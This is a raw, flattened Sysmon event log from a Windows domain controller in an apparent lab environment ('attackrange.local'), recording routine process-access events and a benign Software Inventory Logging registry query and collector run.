AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-64AA-6064-8C00-00000000AE01}44163324C:\Windows\system32\conhost.exe{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.627{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.611{266CAFBE-64AA-6064-8B00-00000000AE01}23404272C:\Windows\system32\cmd.exe{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.626{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c 
C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-64AA-6064-8C00-00000000AE01}44163324C:\Windows\system32\conhost.exe{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8C00-00000000AE01}4416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.595{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.595{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64AA-6064-8B00-00000000AE01}2340C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:46.595{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntd